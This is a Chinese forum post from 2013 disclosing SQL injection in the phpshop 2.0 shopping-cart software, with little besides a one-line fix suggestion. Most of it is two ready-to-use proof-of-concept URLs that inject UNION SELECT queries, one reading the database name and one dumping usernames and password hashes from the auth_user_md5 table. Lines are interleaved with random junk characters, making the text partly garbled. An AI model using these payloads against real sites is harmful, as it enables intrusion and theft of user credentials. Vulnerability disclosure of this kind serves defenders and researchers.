标题 : phpshop 2.0 SQL Injection Vulnerability$ k7 J4 N7 P/ |" t7 V7 O; B0 {
( k& h1 | e h) G' t) h作者 : By onestree
& T% D9 P1 Y0 _; i- Y0 L下载地址 : http://code.google.com/p/phpshop/downloads/list3 e' j5 K( d2 j8 x4 Z
测试地址: windows 7 / ubuntu
: I& U2 Q( y6 \2 M2 P
% R* }& }( k; k2 `% R ; R. u& f+ r# V7 }# y
SQLi p0c:. T! m9 q/ W, I1 |8 g8 R6 E |: b' Y9 j
" K( w# V+ \( h: P* ?0 O
==================3 p ?" f- V# F
9 @" K" F9 j& i5 t R7 Bhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
( H! E& C5 F; _: m8 x! lunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --; j8 o' l9 ?$ D) w% H
& W2 R7 Z M9 o( N# Ihttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--9 d+ t" n* z" k( q2 p# U4 S
1 ?/ R3 T4 N1 F7 Q5 w7 O7 S$ ~
修复:: U2 @5 ?0 W7 F9 R* W
加强过滤) u8 H! c [- f' s* G- w9 G
8 F( T* A% H! s1 @. j" ~! ~4 c3 W7 n
|
发表于 2013-1-18 18:24:10
收藏
支持
反对